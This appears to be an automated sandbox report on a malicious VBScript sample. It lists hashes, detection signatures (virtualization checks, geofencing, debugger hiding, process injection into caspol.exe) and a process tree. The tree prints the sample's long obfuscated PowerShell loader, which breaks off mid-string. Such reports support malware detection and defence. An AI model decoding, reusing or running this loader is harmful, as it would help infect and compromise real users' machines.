329aa623da9d12309613aae2bc312cba7b9ed27949471fd9d18afbd911289ca2

General

Target

329aa623da9d12309613aae2bc312cba7b9ed27949471fd9d18afbd911289ca2.vbs
Size

636KB
MD5

0921510f18af4a47deea90a6324bd25b
SHA1

fce3a737d752f9b644f62ff027d00e09ae68a72f
SHA256

329aa623da9d12309613aae2bc312cba7b9ed27949471fd9d18afbd911289ca2
SHA512

8f26588a3429d41a480f007765547e90a1bb5dd91b707bbaedd85dc8ee68217c2d2aaf2b2800ff2ca4c5f1ac420f664825c71e2742330515fe9434bae3c5011b
SSDEEP

12288:spiDGpQQDCLvBOE3jCmMxHd09yw1zrlhuzB/BKp:vxQDCNOE3OmWqz1HlhSBJm

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	4296	WScript.exe
24	4296	WScript.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1960	powershell.exe
2144	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1960 set thread context of 2144	1960	powershell.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1960	powershell.exe
1960	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1960	powershell.exe
1960	powershell.exe
1960	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1960	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4296 wrote to memory of 1960	4296	WScript.exe	82
PID 4296 wrote to memory of 1960	4296	WScript.exe	82
PID 4296 wrote to memory of 1960	4296	WScript.exe	82
PID 1960 wrote to memory of 1128	1960	powershell.exe	90
PID 1960 wrote to memory of 1128	1960	powershell.exe	90
PID 1960 wrote to memory of 1128	1960	powershell.exe	90
PID 1960 wrote to memory of 2548	1960	powershell.exe	91
PID 1960 wrote to memory of 2548	1960	powershell.exe	91
PID 1960 wrote to memory of 2548	1960	powershell.exe	91
PID 1960 wrote to memory of 2144	1960	powershell.exe	92
PID 1960 wrote to memory of 2144	1960	powershell.exe	92
PID 1960 wrote to memory of 2144	1960	powershell.exe	92
PID 1960 wrote to memory of 2144	1960	powershell.exe	92

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\329aa623da9d12309613aae2bc312cba7b9ed27949471fd9d18afbd911289ca2.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4296
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Agneta = """RepFHaluWalnDemcLivtHjuiGiloIndnSkr GgeHsolTFroBRun Paa{Las Chi Und Mor BagpMadaCoerBiraVaamCur(Ion[UhiSSantResrMiriAfdnRadgSum]Cha`$BasHManSSku)Mop;Ren Sku Uvi Non Gle`$DunBBriyFultAbeeFacsAir Kym=Wea GunNFuseBuswGor-GasOLigbCapjBaseFjecKaltRep AkrbSkayStetSpeeSma[Tri]Pol Req(Jat`$VahHFusSBoo.PolLBitefornLatgBlotNathBra Fem/Mac Lay2Bes)Fri;Fij For Whi Cle InvFWaroFlorSpe(Hov`$TeriFor=Sub0Hug;Stj Jac`$EksiGlu Pag-UddlFrutSue ind`$BefHUnsSDet.LifLTraeBeknKongPectIndhZon;Fla out`$BagiLad+Rab=bri2Tel)Udl{Mul Ort Des Sca Gam Skr Sti Tor Pre`$ChoBDdsyKattEmbeForssol[Man`$LoriTop/Kli2Sml]Cya Kon=Int Sub[FagcSkaoUdbnTwavDobeMagrRentAnl]Hea:Ora:MadTViroTykBEpiyNontNoneUnb(Udl`$OpsHDerSIsf.howSRimuImmbDjisPantExhrDiviFamnSabgDus(Met`$AddiOut,Str Whi2Amp)Xan,Aut Akt1giv6cer)The;Orv Har Flo`$BaaBSquyKnitGadeAbssRud[Snu`$HygiSne/For2Kam]Buf Rin=Sol Wee(Int`$LesBSciyDemtColeGarsRaa[Ree`$VriiAgo/Pet2cla]jef Bli-minbEspxBraoOverKli Rec2Nat2Dea3Dal)Gen;Ret Bre Fla Lig plu}Raa Tro[HaaSQuatSemrMagiPaanUnwgNag]ref[BleSSemyPresTyntYedeItemPel.ReaTCheeGenxisvtvar.RepESonnBancGasoJugdViriSvenReggPue]Sfm:Hal:IntAVrtSnglCValISisIBlo.SpiGRegeMintBirSRegtHydrIpaiKamnLucgKog(Udv`$SekbGaryDortForeStosLam)Shi;Sti}Mus`$GenOTalpintgTelrHydeWatlCemsExheAcqsSig0Che=ComHPinTgruBPyr Bis'ano8dysCUnrAOot6SenAJagCAntARocBEmpBPreACulBFol2AblFTat1ProBSamBcodBOrn3AvoBCol3Var'Swa;Dgn`$SjlOungpGragUrarUnreImmlLansScaeNonsBow1ban=MorHAntTreiBRee Pil'uml9Int2MulBCom6SmaBBeuCaarAKlaDStaBBie0ddtAFatCTraBNon0LinBcym9LepAPriBBreFneu1Cra8Het8StrBPro6InvBAfl1SmaEShaCGeaEManDArcFSku1for8SunAInkBAns1ComALnaCUncBOpaEKleBRan9SviBjorASvi9uds1InsBExhEOdoAFirBTriBKri6BenAJud9ColBCroAden9Not2uncBPerAArrAConBGenBUpd7TouBafl0BowBGolBDisAStiCTep'Kin;Til`$UndOForpSklgArcrUbeeNarlHessHagePersRaa2Tre=GteHDecTHerBAns Pon'Res9Mik8EpoBOcuABosAparBSku8GuiFScrAPhoDTypBImp0SheBlogCIne9RenEasyBRhiBLepBFalBRikADiaDAfsBRidABywATheCKilASelCAmp'Alp;Fot`$AmaORespMingGalrTrieindlStasSvieSalsEta3Ail=ImmHSprTSheBDig Emf'Vic8RevCAluATyk6TarAIssCNarANetBAdoBLarAbdeBbra2KamFPro1Han8jouDAnfATilAfyrBTrs1MajATitBConBCre6InsBSka2CluBHetAVerFVit1For9Bio6BalBGou1fejAUndBSusBKopAAnaAVawDSkyBDat0UdhAOpiFPan8komCForBEnaADatATroDKulAOve9FirBUns6UndBOptCOrdBMerADefAYapCHolFGiv1Reu9Gai7FitBFliEJeoBPol1MaaBvakBFrsBAna3EnaBMonALon8SpaDDroBAntAProBNon9Ove'Gul;Dia`$NotOHydpBungUglrStrekrilSocsBareEggsSmi4Col=AcrHRatTForBCon Unt'MarAProCParABegBTriAPasDSpaBKrs6TolBCir1UndBStr8Hal'Kle;Imp`$SpaOThepIdegImprBryeTaglMutsGooeSymsIrr5Ove=AnsHSpaTTrsBTek Ren'Gav9rug8VinBGynAEndATusBCar9Rea2KamBAgn0BroBAunBPrvAArcAForBSto3UneBBelAGlo9Pro7UdsBFlyEWamBAng1RubBUniBNeuBSep3RatBSerAOpk'Niy;For`$JakOSalpNorgcoprPaaeOphlMarsPlaeTrasSti6Rev=HnsHBowTandBlok Ann'Pre8ResDPre8HusBCow8SkiCzubABalFSlaBStuADeiBLocCRecBCha6ForBAfsEBerBFys3Res9Ens1EpiBPonEOutBPam2OccBsymATrvFCum3CelFBruFSou9Uni7SjoBHul6TopBpalBrolBEupAEne9GenDMasACas6Tip8OprCKnoBErh6KarBPas8SqrFEvz3ApyFPanFMon8MisFAfrATorAForBSkjDForBTen3pulBsam6SumBUniCSal'age;Sle`$DepOdoupSubgVelrFreeNonlGigsPepeMetsTra7Gen=ForHTriTNonBImp Buk'Ree8NonDUapAFylAHaaBSpo1MilAVulBLinBSke6GolBTim2BasBOveAArcFKvd3FagFBoyFAsy9Tec2CarBTruEPerBRid1UdlBClaERkeBFel8OveBTurAGioBMorBAmo'Ret;Mec`$flaONstpPtegSphrPareanklaarsSeveAkksBir8Bru=HypHMisTTitBOve wol'anm8TarDCroBlopADioBAss9PreBOut3hypBQueATerBLadCDeeAChiBUnjBSadAyirBbekBLov9AfsBFusBproAoveBAas3fraBTelAFreBPom8DunBPikEFreAMumBsygBAtoADef'Rew;Mon`$TypOTripCasgBonrMyseGaslToksDkkeUnisLet9Hus=FemHLowTslaBKno ove'Vrt9Fra6OvaBPro1She9paa2KolBBibAPrvBAme2AanBMil0podACapDcenAPer6Kor9ved2NonBBat0TypBHosBOveABolAdiaBSko3ForBReaAOut'sel;His`$BesTPrerStaiSpetCerestalLudeOiliHanaNon0Kle=AllHStaTBlaBDha Att'Ste9Uni2SovAPro6ino9VelBUnbBGunANonBCin3GraBNonACykBSkj8FakBAceEGleAkerBDriBrghATil8hocBconAFor6SimATraFForBEphAEld'Fel;Fin`$VocTIrrrYvoiArbtCateFlalBageEnaiSecaNor1Ent=UbeHModTRecBTen Ska'Jou9selCOpsBTrn3UmbBOehEStyASloCAncArazCRinFHan3OppFMrtFNon8UnfFBesAResADisBAdoDSprBWot3PotBUbe6ShaBNarCCreFSta3ConFTomFDra8SteCdioBHulAUdgBsveEOxaBInt3RenBSilARecBLasBbasFSup3ChoFFlaFCon9PosEBygBRef1PasAOpsCManBBed6Spe9LiqCForBPho3AigBEmmEMicABonCJagATroCPreFHal3MilFUniFRaa9sprEGrmAsarALigATopBPerBGon0Acr9PadCRicBNit3BasBDueEDonAConCrefAKatCSli'Sup;Stf`$OpsTtearSlaiStatGraeKrilUntefasiJeraFor2Mou=GraHProTtreBGla Ela'Hju9Ple6GirBRge1BliAMon9ZinBKaf0IncBCav4MunBRifABud'Mys;Bac`$FraTFolrTiliSkatHeceSkrlBraeOptiBedaFil3Adk=MicHArcTSoeBMet Gym'ned8KabFKonAAviAAngBMyrDFanBCae3RouBSst6perBnonCHovFPla3togFGruFPer9Nav7PetBFor6antBBatBUinBHelAPas9NonDDraAGes6Gar8TunCSkjBOve6TerBSen8CogFBow3AmtFAgoFRom9Fje1CerBOffAlocAFlu8Liv8GedCSndBRec3ForBOve0SkrAPreBPreFCas3PaaFMusFAbs8Cat9AloBRak6KomAPreDEksAspaBSamAHumASocBSevELusBOms3Dan'fli;Kit`$MurTOverHaeiEletEkseUnclsaneBaaiBacaDec4Fle=AziHSkeTKomBKlu une'Sil8Aut9ProBErh6ImmAbowDUdpAJanBSlaAHejACapBRetEDisBFor3Tot9TekESulBNeo3fgtBThr3PalBMyt0IgaBUnsCXip'Stj;Rig`$BesTKrarInsiPantUndewaulHdeeGeriTraaGal5Cou=LutHIntTUkoBHco Upg'RanBDoc1UnsAIndBStiBTelBNeiBSla3AdkBInd3Mic'Des;Epi`$ForTTekrtuniPertButeFralSpoeAccimewaEpi6Stv=UnvHRetTuncBSon Tra'Oph9Phi1RegASalBBru8proFHalABrnDDatBHal0CitAagtBPreBRabAMelBAssCDicAIndBNed8Par9IniBKor6SomAAfbDAfsAUneBMisAStaACobBinfEFeeBMis3ves9dyn2KunBMosAMagBVik2LnkBFri0KatAFudDParAUds6Ola'Pri;Ion`$ManTEthrOreiImptConeAprlUnceBasiChoaHal7Pre=UdsHtolTProBSwi Syn'Trv9Bro6Dia9LreAPan8Jen7bek'Ele;Kan`$UglTshorProiSkotareeIndlAsmeAgriAnkaCon8Mis=IndHMarThorBKri non'Hur8Esp3Amp'Rus;GteSSqueBygttav-FliAPurlBeriindaBibsCli Ind-MicnsufaEnumcecePah ThaTTrerSkoisuptGeneSkilAuteSikiDisaint9Bln Alm-KervSataEtilSquuPygeTur Ber`$neoTbenrDeliProtInfeRivlForeOvniSevaKol7Pre;ShufFeluTubnStecPaktForiSploEntnLok SkyfTarkChapBal Off{MouPentaIntrOveaHjamFor Ant(Und`$DayvWha_PremFal,Ven lek`$ResvNot_EqupSyn)Beu Tap Fil Gib Pos Car;Acc`$StuADiltWatrAlfiHjluMalmudlhmytuPomsChasAfb0Tro Anv=SpaHChaTOneBRes Afs'BriFTriBConAKon9HarATaxAJizBMul1nonBGad2AccFSupFDexEAla2TanFElgFFinFFur7Mer8Geo4tre9HioESatAGodFComASekFSou9UtiBOveBTra0GldBBro2DroBrisEMayBKaa6FlaBAkt1Hyd8Bli2KirEOve5ImbECar5Rrh9ArmCvitAVagAInhArosDHobALomDengBAdvAKonBTru1SekAHelBsen9SolBNonBOve0panBBil2BreBUndEpinBPer6digBAfd1KorFtor1Com9pro8DukBIndAAarABypBDem9OveEKvsAFreCmatABarCUncBHosAIndBAdj2SerBTrlDMonBPos3Kr BBis6natBSprAundASluCKorFOut7LarFSul6HeaFbruFVapASyg3GenFmasFDyr8Lic8VerBNit7WeaBBesAstiADewDAfsBCreASkoFCou2Kab9Sen0DreBCimDkleBAut5LysBVedASemBTryCSouAlivBQt FInkFManAMad4DesFSkaFDetFUnaBHav8Par0MesFSpa1Luf9Pre8preBLav3FosBNnn0TraBAntDMonBVinEJalBPol3Ste9KvaELorACubCGluASubCTelBNitAAxiBTer2ConBSdvDSurBSkj3UtiACer6Gyp9BerCBobBSiaESelBPreCIndBBus7DetBBoaAMonFeskFsteFPar2Chi9BeaEManBpor1SpoBKuaBKonFGalFRejFAdrBAma8Miz0MilFMne1Was9Rid3KnyBSho0GenBcorCChiBLejElimAPusBturBpas6DruBRen0MenBWei1Au FUfo1Rui8NonCSyrAmetFMarBChr3PanBOpr6SejAScaBLarFEje7MysFFeoBmel8EquBSnuAChuDGttBChr6ClaASubBHaaBSkyATjeBint3SynBTelADelBPat6MilBArbEMilESvi7nonFSyn6Den8Trk4NitFFor2OveEUsaEBye8Jus2SnoFbyn1Cru9PulAPurABarEDekATouALacBCerEBroBTot3tjhApegCDreFFre7AktFDaaBMic9Srb0RedAPraFUltBurs8PreAAmpDBamBLeaAPulBSal3VilAAttChanBforASkrASmaCForEFleFTraFBem6RecFGlyFansADri2TakFbia6SilFFak1For9car8MerBMisAEftAKadBOch8TekBBriAcon6LacAEquFRelBMicASelFFal7SpiFSneBPse9Sub0DemAArrFUreBafk8MicAStaDGreBDynASwaBGig3SclAfirCSteBUriAProAFelCSmrEAntEOffFUnb6Ove'Win;DriTBekrShiiTagtForehetlJameKomiKaraNat9Cou Tas`$AbnAEkstVenrNuciAliuStrmManhNonuBetsFolsChe0Peh;Tid`$TokAPantBrfrTrniDiauFemmKathstyuRefsIrisdam5Pho Cui=Par ForHCemTTimBSma Alk'CogFSafBunbABis9TwiBRasEAfsAFeeDFor8Ine0TotBTup8TitAAbsFCalBLsnEFykFAfrFKasESkr2ForFforFBetFGirBtilAFla9CalAUnbATutBSta1ForBDra2WeaFAmb1Eks9Sup8SviBOveAKomAGlaBCar9Pro2ForBFruAKetANupBExhBCri7ParBSpo0UnfBAstBPezFFul7RecFSkyBDat9Nat0OphAUnoFbruBJer8ultAEftDPunBOrzALutBEll3RitAFraCPalBBibAProAChaCAlcEForDKasFOto3UnsFGarFSmu8Afl4Ind8KakBhydAGaz6omvADecFIndBKarACon8Bur4Rea8Cin2Hos8Bik2InkFPieFBlo9claFHovFNon7AfsFSrmBTea9Heb0EpiATogFBndBRec8JugAAffDResBSvrAtreBEup3NonATydCdamBRicAVebAEuuCHerESvuCRovFBlo3petFUbeFMikFPreBPar9Tur0sknASubFHydBOve8KapARykDStaBUnpAUdpBSha3ArmABirCSidBChaAErsAmicCShrEStaBSmkFbab6ThrFPho6Con'Tes;SigTMonrStaiUndtSldeFlilLigeTiliEufaDis9Suk Cha`$AutAPiatWoorExpiScruMarmReohUdluForsMetsBoo5Fre;fun`$ForApertForrGeniUnwuSammStehToruHassovesChr1Fav sak=Neg DisHCliTBesBSko exp'ShaADorDmajBbraAReoABesBPedAHooAStaAReqDBliBSub1IllFTraFVaaFGenBSkrAAle9KlbBBorEhekAEksDApp8Uni0TekBRes8NonAStaFSpiBThaEKetFAff1Spi9Uid6KleBLov1StrABrn9FisBSti0PatBDes4StrBKejAMilFBag7SniFIsoBLgrBKvi1BegASpdATraBGen3GraBPig3blnFref3MoaFForFIni9NonFPosFFol7Lin8Skl4Par8MedCUdrAEnk6AvaAKraCSkyAIceBEquBKanAichBbas2RunFTat1Hig8AntDDowAAusABikBFor1GruAhomBRatBTre6RdaBOve2MosBLolATveFStj1Bre9Akt6JulBPre1BraADubBcerBFriACamAGriDinkBInd0BovAAftFFla8HorCProBWitATheAIntDWhiAHis9HeaBVen6ConBMenCmaaBOtoAhumARanCLoaFHyd1Sym9Tra7TwiBFilENatBSkv1SpkBSilBPolBMaa3filBZigATom8BilDSlaBAntAPosBSkk9Rid8nor2DomFsem7Pas9Fla1PoiBMorAtonAInt8PulFAlm2Ass9Nav0AttBSepDPasBfro5RigBOrtACamBLauCoveAYelBDwiFNatFMan8StiCLanAind6DerAHolCHyaAsupBMetBPleAOffBSti2DerFBat1Ros8RidDDubAMyoAMarBMot1widAAdvBUndBPer6DraBCom2RenBAndAproFBav1Foc9Pap6EreBDiv1ExrARubBAdoBgruAJenADegDSkrBthe0sulADreFOrt8ambCMaaBHygASerASecDPelAPro9PriBdro6BriBpoiCUnjBLseAJibAClyCUnmFPas1Rea9Ove7TehBGeoEUdtBDel1aanBRaaBUdfBJog3FokBTraANvn8VamDSevBVksALigBPyr9SliFbin7OveFNon7Neo9Tac1JorBUddAQuoABeg8SugFStr2Pro9ant0ClaBTroDProBLas5OveBSpoAInsBUnaCsanAHjeBRosFFogFGaa9Lig6HusBLag1milABioBGri8DuoFskyAfilBBarAoveDPreFMye6ShaFSkr3HalFTeeFMesFDat7CasFFriBCykASal9ginAPenASubBSme1AutBPen2afsFOpd1Vol9Non8TriBIntASprAFugBDia9tar2blaBMaaASpeASolBPieBPad7CarBZun0IndBRepBGruFLin7ExpFforBSto9Bog0BirAWebFKolBSvi8RadAForDChaBCojAFinBPol3DisAconCUnsBrecAValAetuCAirEunnAKonFCho6CavFCen6DriFLed1Lit9Rin6AgeBPip1EksAZoo9UdlBBat0SkaBFre4AnaBSprASupFRub7TidFMeiBIldBalt1DerATriASneBRke3HleBRen3CacFUnc3AccFBliFSal9AflFUdpFGhi7BerFhalBBawAEla9Pap8Pla0GeoBLab2SinFKnu6SmaFBry6RveFHam6AppFPar6SubFSan3aboFDobFOveFForBTypAAna9Hol8Sva0EinABevFChiFTax6BogFOoc6App'Ene;SkaTToprSnoiDistAmpeUdslSwoeKiriHenaMat9Rel Kon`$wisASejtCycrMariArkuVismBlohEquuHarsSabsEks1Alk;Man}TrafUnjuFarnNoncPertSkaiDayoRennMid KryGSveDKdgTSle Veg{UndPAsiaMulrDiraIndmsto imp(cri[DilPGrnaFidrEuraFormSpoeAagtKegeUnprNex(SpoPReroKonssoriEnftSkuibaloBirnPon Pri=Tra Und0Fra,Hyp ConMExoaReanDyhdShiaInvtKatoEmirEpiySil Tot=Mos Kva`$BanTGrorIndubrneKat)dil]Udv Ris[GanTAmayStipSaaeKap[Fos]Udv]Bus Gul`$LatvForaBerrUdd_DodpLydaSirrGasaAftmRedeBeltOoheMderGetsFod,Sne[CorPCiraramrForaSanmAtteImptKateUnirUni(disPDecoAgesSnuiSyrtAffiTraoMilnDzi Nor=Cob Dic1Fug)Dyb]kar Sli[TraTDivyIllpGruetro]vin For`$NepvComrtyrtkin dte=Gun Loc[GilVMonoKoniBlydSmu]Tel)kon;Cot`$BnkAFritOmtrStriLnguUfumCadhnonuUdvsPresPro2enk Pap=Int OctHDeaTintBFos Sma'PseFAfgBRee8Heb9Hov8PreBFus9BetDRenFUncFSubEJov2SaaFParFSub8Fad4Thy9DucEAnaAKviFSolAKonFUtr9PhoBInfBIns0falBKam2PreBOveESupBHal6TakBanb1Vac8Fut2FilEMag5VipEUgh5Org9ReaCKodAUneALveADslDFruABusDAflBTraAPreBOlf1InvAFriBInd9HanBBalBTri0VisBKau2UdvBKalELucBPal6FosBFen1poeFOff1Byk9FnyBSycBnonAManBKlo9korBKat6CogBArb1belBNonANuc9sukBTakAGal6ForBKon1DisBBasESvrBEte2DerBSta6VolBPelCRig9ZloEComAHasCThiAPlaCSknBresATekBDek2GenBStaDideBgap3SynAFed6TroFFut7UndFNut7slu9Var1EsgBSkiAPedATek8TetFNep2For9Car0ForBMadDPlaBDem5UndBHanAMasBgulCYdeALevBBedFgurFBrn8SouCskjAAnt6HatANabCMicASidBHuiBKarARumBEuc2ArcFPer1Met8FasDDocBCalALanBMod9PriBEmb3TurBSocAtypBSalCSubAEksBPerBDis6LivBSce0uniBRec1FisFSem1Ste9BroEUntALykChusASkiCSdvBTreAkolBKva2RepBFilDEnaBPro3broAKog6Mit9Cry1IceBAldEGenBKkk2BukBDepAKnbFTeg7SquFUdlBUnw9Bri0couAInnFFrdBOmd8VisAKekDDatBKlyAUgeBbef3EftADegCUdbBSerAslaASniCRivEMil7EksFStr6TraFCen6volFbeg3KutFDiaFVan8Cal4Gri8RasCAutANav6ResASolCMesADivBCriBPerACalBove2SneFGen1Bom8DriDIntBPerAGreBSai9GlaBDri3SamBLnnAStaBSalChavAGenBAerBDio6ellBWer0SejBUdm1GrkFkah1Bre9UdsAStrBWre2proBInr6TekAFurBFigFAmo1Nar9IdeERubAXerCPreACraCHinBAstASolBraf2MasBNoiDintBMin3DisARef6Fjo9yppDTarAGttAStaBApp6UdrBSlo3UndBCenBrepBBobAValAGobDudl9TvaETrsBCreCUnmBsilCSkoBUnbAHasAdemCRidAStrCCor8Til2SolEGen5NeaEImp5Pro8forDDgnARetAKenBFor1UndFkla6PinFLjt1Opt9EviBPlaBAraAdobBPol9BusBOms6SpeBgas1AppBSocASuc9BesBFolASta6IntBTra1SciBPriEOpaBSol2FreBBrn6RicBmilCKoa9Mus2FarBbrd0WaiBRicBFovAEjaAClaBAnn3IntBUnsAVerFUnb7StaFBajBemp9Una0TenAKerFAnaBvik8ForAEmeDIneBReaAUndBImm3NonAMonCAntBMekAAvaANatCOmvELes6IntFBal3SklFTovFBoxFRosBOnkBUds9DriBChiEEksBFra3ManAdisCKryBAteAsigFTre6TreFPen1The9FelBtarBTonAUnaBslu9ErhBGal6PheBWaf1HjlBAakAExa8fedBSgnATer6ResAkonFTutBNemAPhoFPra7ImdFStiBIx 8smaBMaaAhouDAnkBUna6RenASkvBBloBNeuAUntBLit3ShuBKonAErhBTnd6DogBHitEUndEcenFSekFgld3SenFUnsFLacFMulBSto8LepBGeoADueDClaBapp6TriAUndBChaBUnmACirBBri3NotBsteADraBgge6EveBTraETirEetiESerFInt3TriFSenFnot8Sel4mem8RusCEccAMis6ExcAtriCSpuASkrBidiBGifAKluBstj2NodFOut1ker9Vga2TopASemACovBFod3OutACooBHolBFir6LurBUnbCOveBPerEIskAGafCTydAArbBRis9VrdBEjeBAphAAdmBFla3SpiBDanADobBEre8ForBtimESplAChaBDieBPheAEna8Una2PbxFNon6Ocr'Jag;CurTRubrReniCuttAsteImmlMaxeUgeiBalaCas9Sem Tek`$FarASmetcorrSamiTryuuvsmundhBlouMissForsflu2Mul;Con`$SgeAUpbtVaarNatiGuluSnamUnthEuruCatsEftsOve3Ril Reg=Hou EasHHenTClaBSub neu'EupFGrsBBnf8Bas9Sma8SupBSnu9PanDSmaFAtr1Pig9AmpBGarBUndASvaBSta9troBFin6GunBPow1LivBWedADuk9BruCPioBGer0SpoBUnt1ForAhetCAffAInjBOdoABidDMarAIndABarBOptCMetAAntBUbeBBde0AffASumDOstFHus7PetFHygBMag9Sku0IndADisFDesBDrs8DyrACarDValBBusASpeBPro3svrAmanCEnsBAutAEnaAPaaCCusEchl9EmbFLab3FanFUdrFPro8uly4Qua8BlaCCenAAfp6RigAaftCPanACopBIndBGutASolBSum2GalFBln1muc8UndDDdsBOccAWabBImm9ChoBCro3VolBSkrAPerBskuCEndARejBRepBFin6ArcBLec0TerBAba1NorFVer1Ove9AmeCUdtBsanEgiaBBek3DatBSki3PedBMet6VrdBTra1OveBOrl8Fut9DraCBolBUdk0ortBHyp1amaAMoe9udsBDjeADybBHat1ForAMacBSumBInt6NonBLax0BetBMus1KonASktCVoi8Niv2PolESlu5LejEDum5Bjr8ShoCConAPinBfagBSpeEProBPec1TekBKomBTraBDisEBriAFriDsugBBorBBanFLeu3FerFMarFadsFNonBGamAKys9AntBDatEStaAAnsDGen8Van0KomAOveFProBTenETufAAldDFonBsemEUglBFor2VivBKwaASedABesBForBIslAbelANonDErsAoveCCaiFRad6SamFVin1Ove8TreCTetBStyAGraAFadBBaj9Fla6oktBVer2KraASepFRemBNat3AviBGalAstrBLsg2AreBDewAKmmBBev1CirABanBArtBNonENeuABrsBforBBec6BanBFag0tacBboo1Dos9Sig9UppBDrj3SupBPatEStaBban8RerAAbeCTroFDis7StiFHedBiri9Hov0BraAEsrFRidBgas8PerAMegDGluBSomASknBEnn3DamAbecCchaBIguAArcAStjCpreEIkr8CarFBor6don'Bac;DerTAmtrSpiiRdntBrueKonlCraeStriTakaEct9Amo Cas`$MisAnontplurImmipreuFormspehOveuTrisSolsSex3Fri;Pel`$SceAStetSeqrTauiGrauAfrmsochPeauAnasSprsHes4Une Vrd=Mdd WroHNinTAniBAnn Fag'ForFQuaBBio8Stv9Bri8incBErh9GagDAneFAxi1Bes9GloBJulBGruAWafBPan9SmuBPre6ScrBUnd1BloBLysAkap9Pse2YamBWaxABetAAntBMesBTry7SalBBil0FemBEvoBNysFOpg7FilFTatBRep8FunBApaAPotDGnoBWea6ComACluBEasBKomAbinBCai3BraBRobAUdmBPaa6opbBConEIndELigDVarFDis3droFLagFShlFTegBNoi8GavBSudASpnDManBRum6BonAValBManBPheANatBCop3BesBincALftBTyn6TurBsevEBodEVasCGenFUnd3EloFPusFMaaFSygBObsAPoo9lanAKluDPowAAdvBGenFRep3AfhFUnwFForFHolBEftASkr9ComBBriESneAKloDSus8Pus0RekAUlrFGraBInaEMjeAIntDpalBBusEArrBMou2EyeBTanAMagAEpiBAssBHaaAureAPerDMllAWooCUncFNon6CatFBob1Trl8HjeCGerBSukAHinAsvrBStr9Por6DefBEle2MelAResFTreBCec3MolBUneAHipBkry2KilBHinASalBPan1VisAImpBGibBCusEMaiAHypBHjlBBaa6GobBDis0DigBSkr1Lat9opf9TeaBFor3StiBTilEMicBWha8FinABrsCYazFTeg7pudFBadBIni9And0TarABrkFslvBAus8CryAFljDfreBNoeABloBSat3HvsAyeoCLanBFauAPhaACofCOttEpri8raaFunr6Ant'Ove;ToxTAkarpatiBagtSweeOrdlMogeTabiUndaRhi9Hum Val`$UndAHautCanrTveiChlukommOrghPhyuAdesMedsInn4Pri;blo`$StoADestIncrItaiBeruGavmCaphTapuSknsGavsSrv5Fra Thr=Str EveHAttTSidBSto Sta'covASolDDisBFooAMicAStiBRecANonAPosAMaaDHemBHje1KurFEveFPhyFStaBToa8Rea9Ren8MidBUnv9EthDFisFras1Pla9PhoCJesAOveDIspBDepATraBSusETaaAForBSvrBMerAJuv8DepBYacAlod6OveAKonFRidBhjuADatFTul7ForFEff6Unl'Sli;BeaTTrirFljiPrgtBloeDiglMolePleiTykaOec9Bou Mnn`$AceAOgetBalrBeviFliuMilmRamhUneuTersAcesRom5Fem Ren Bib exc;The}Rat`$UdlkRitkNic Jon=Vir SpoHReiTNivBLav Sul'MulBVan4MalBTenAIndAMusDTraBAma1LokBAndAGraBDie3strEGisCDagERulDKar'Baa;Cen`$LavAIrrtAsprOediImpupromIarhEpiuFarsYarsBru6Bla Sha=Afs NonHSatTJagBHel Mai'RubFSpeBqueACuc9DroBBanELinAEmuDfru8Unh0ColATek9MatBRekEfugFtenFLecEfre2MesFBetFRet8Ski4Par8MyrCHydAMoo6RehAIndCSamAPenBBilBIndASteBUvi2MuhFPau1Ulv8ForDTerAEncASkrBSpa1SpuAOpdBHapBjew6DieBJug2LadBKarAEnhFOpt1Kal9unl6EskBUns1PrfAHreBRefBGynAAtoASekDSubBFar0RomAImpFSyn8TipCStaBoptAUdsAEnsDTopAper9ChiBHov6KonBTeeCAflBPalASunAVanCBokFWor1ans9Can2entBNekEGliAFluDFinAUdbCTrlBdig7KviBPerENeuBKha3Ent8Tos2GlaEPho5SlaEKal5Evo9Con8LilBFloAMisAIodBTtn9FokBNonBNriAEjlBIfr3FooBDolADirBDiv8CenBUncEMisADueBRokBAabAdra9Bel9RefBPap0ParAUnfDBal9Ste9RecATilAEreBTig1UdtBStiCUdkAGirBSkrBNon6SprBThr0HerBSka1Afv8RenFUveBPre0CadBGal6DisBStr1gabALepBFulBKurAOpbAParDmedFRad7VagFAnt7SpiBmci9EksBcer4fejAgruFAarFRatFmemFDraBSeiBsyn4SnyBHof4BloFTraFseiFAutBKra8BotBcorAOveDBehBRac6AgiASelBFisBWorATruBPol3IbrBSrnASysBuds6ExcBbesETilEPolBdomFSkr6stoFSte3TraFscrFPriFThe7Int9Tol8Irr9HerBWag8BooBDarFcelFSer9AmuFTeaFRev7Pol8ket4Kra9Pro6ResBSym1RetAMidBFl 